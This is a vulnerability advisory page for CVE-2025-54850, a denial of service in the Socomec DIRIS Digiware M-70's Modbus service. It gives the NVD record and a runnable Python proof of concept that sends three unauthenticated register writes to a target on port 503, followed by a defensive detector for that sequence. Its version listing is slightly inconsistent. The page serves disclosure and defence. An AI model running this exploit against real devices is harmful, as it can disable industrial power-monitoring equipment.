Security Vulnerability Report
CVE-2025-54850 CVSS 7.5 HIGH

CVE-2025-54850

Published: 2025-12-01 16:15:54
Last Modified: 2025-12-05 20:20:10

Description

A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability. An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change.

After this configuration change, the device will be in a denial-of-service state.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct
import sys


def create_modbus_rtu_packet(unit_id, function_code, register_addr, value):
    """Create a Modbus RTU packet for Write Single Register (Function Code 6)"""
    # Unit ID, function code, register address and value, all big-endian
    frame = bytes([unit_id]) + struct.pack('>B', function_code) + struct.pack('>H', register_addr) + struct.pack('>H', value)
    # The RTU CRC covers the unit ID as well as the PDU and is transmitted low byte first
    crc = calculate_modbus_crc(frame)
    return frame + struct.pack('<H', crc)


def calculate_modbus_crc(data):
    """Calculate Modbus CRC16 (init 0xFFFF, reflected polynomial 0xA001)"""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 0x0001:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc


def exploit_cve_2025_54850(target_ip, target_port=503):
    """
    PoC for CVE-2025-54850: Socomec DIRIS Digiware M-70 DoS
    Attack sequence: Write to registers 58112, 29440, 57856
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((target_ip, target_port))
        unit_id = 0x01  # Modbus unit ID

        # Step 1: Write 1000 to register 58112 (0xE300)
        # Indicates configuration change will follow
        packet1 = create_modbus_rtu_packet(unit_id, 0x06, 58112, 1000)
        sock.sendall(packet1)
        response1 = sock.recv(1024)
        print(f"Step 1 sent - Register 58112 = 1000, Response: {response1.hex()}")

        # Step 2: Write new Modbus address to register 29440 (0x7300)
        # Set new Modbus address
        packet2 = create_modbus_rtu_packet(unit_id, 0x06, 29440, 1)
        sock.sendall(packet2)
        response2 = sock.recv(1024)
        print(f"Step 2 sent - Register 29440 = 1, Response: {response2.hex()}")

        # Step 3: Write 161 to register 57856 (0xE200)
        # Commit the configuration change - triggers DoS
        packet3 = create_modbus_rtu_packet(unit_id, 0x06, 57856, 161)
        sock.sendall(packet3)
        response3 = sock.recv(1024)
        print(f"Step 3 sent - Register 57856 = 161, Response: {response3.hex()}")

        print("Attack sequence completed. Device should now be in DoS state.")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_cve_2025_54850(target)
    else:
        print("Usage: python cve-2025-54850.py <target_ip>")
```
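For the defensive side of the same sequence, the following Python is an added example (not part of the original advisory, the Talos report, or the PoC above): it parses Modbus RTU over TCP frames as they would be carved out of a port 503 stream, verifies each frame's CRC, and raises an alert once a single client completes the three writes the description lists (register 58112 = 1000, then register 29440 = new address, then register 57856 = 161). The register numbers and values come from the advisory; the sample traffic, client addresses and unit ID are constructed, and the parser assumes the TCP stream has already been split into individual RTU frames.

```python
import struct

FC_WRITE_SINGLE_REGISTER = 0x06
# The three writes the advisory describes, in order: (register, value); None = any value
COMMIT_SEQUENCE = ((58112, 1000), (29440, None), (57856, 161))


def modbus_crc16(data: bytes) -> int:
    """Standard Modbus CRC-16 (init 0xFFFF, reflected polynomial 0xA001)."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


def build_fc6_frame(unit_id: int, register: int, value: int) -> bytes:
    """Build a Write Single Register RTU frame; used here only to construct sample traffic."""
    body = struct.pack(">BBHH", unit_id, FC_WRITE_SINGLE_REGISTER, register, value)
    return body + struct.pack("<H", modbus_crc16(body))   # CRC is sent low byte first


def parse_fc6_frame(frame: bytes):
    """Return (unit_id, register, value) for a CRC-valid FC6 request, else None.

    Assumption: the caller has already split the TCP stream into single RTU frames.
    """
    if len(frame) != 8:          # unit(1) + fc(1) + register(2) + value(2) + crc(2)
        return None
    body, crc_field = frame[:6], frame[6:]
    if struct.unpack("<H", crc_field)[0] != modbus_crc16(body):
        return None              # corrupt or truncated; a compliant device drops it too
    unit_id, function, register, value = struct.unpack(">BBHH", body)
    if function != FC_WRITE_SINGLE_REGISTER:
        return None
    return unit_id, register, value


class CommitSequenceDetector:
    """Per-client state machine over COMMIT_SEQUENCE.

    Unrelated frames are ignored rather than resetting progress, so interleaved
    reads or writes to other registers cannot hide the pattern from the detector.
    """

    def __init__(self):
        self._state = {}     # client -> {"step": int, "new_addr": int | None}

    def observe(self, client: str, frame: bytes):
        parsed = parse_fc6_frame(frame)
        if parsed is None:
            return None
        unit_id, register, value = parsed
        state = self._state.setdefault(client, {"step": 0, "new_addr": None})
        exp_reg, exp_val = COMMIT_SEQUENCE[state["step"]]
        if register != exp_reg or (exp_val is not None and value != exp_val):
            # A fresh "change follows" marker restarts the sequence; anything else is ignored
            if (register, value) == COMMIT_SEQUENCE[0]:
                state["step"], state["new_addr"] = 1, None
            return None
        if state["step"] == 1:
            state["new_addr"] = value          # the address the attacker is configuring
        state["step"] += 1
        if state["step"] < len(COMMIT_SEQUENCE):
            return None
        new_addr = state["new_addr"]
        self._state[client] = {"step": 0, "new_addr": None}
        return (f"ALERT CVE-2025-54850 pattern from {client}: unit {unit_id} "
                f"Modbus address change to {new_addr} committed (register 57856 = 161)")


# Constructed sample traffic (not a real capture): a benign write, a frame with a
# corrupted CRC byte, then the three-step sequence with an unrelated write interleaved.
_bad_crc = build_fc6_frame(1, 58112, 1000)
SAMPLE_TRAFFIC = [
    ("10.0.0.5", build_fc6_frame(1, 100, 42)),
    ("10.0.0.9", _bad_crc[:-1] + bytes([_bad_crc[-1] ^ 0xFF])),
    ("10.0.0.9", build_fc6_frame(1, 58112, 1000)),
    ("10.0.0.9", build_fc6_frame(1, 4000, 7)),
    ("10.0.0.9", build_fc6_frame(1, 29440, 7)),
    ("10.0.0.9", build_fc6_frame(1, 57856, 161)),
]


def run_sample():
    """Feed SAMPLE_TRAFFIC through one detector and return the alerts it produced."""
    detector = CommitSequenceDetector()
    alerts = []
    for client, frame in SAMPLE_TRAFFIC:
        alert = detector.observe(client, frame)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

On the constructed stream, run_sample() returns a single alert for 10.0.0.9 naming the new address 7; the corrupted frame and the benign writes produce nothing. Because the device accepts these writes with no authentication at all (the record lists CWE-306), the alert is most useful when paired with an allowlist of hosts that are permitted to write configuration registers on port 503, so that any completed sequence from a host outside that list is treated as an incident rather than a change request.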

References

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54850",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-01T16:15:54.080",
    "lastModified": "2025-12-05T20:20:10.270",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A denial of service vulnerability exists in the Modbus TCP and Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted series of network requests can lead to a denial of service. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.An attacker can trigger this denial-of-service condition by sending a sequence of Modbus RTU over TCP messages to port 503 using the Write Single Register function code (6). The attack sequence begins with a message to register 58112 with a value of 1000, indicating that a configuration change will follow. Next, a message is sent to register 29440 with a value corresponding to the new Modbus address to be configured. Finally, a message to register 57856 with a value of 161 commits the configuration change.\r\nAfter this configuration change, the device will be in a denial-of-service state."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-306"}
        ]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*",
                "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"
              }
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": false,
                "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*",
                "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2248",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```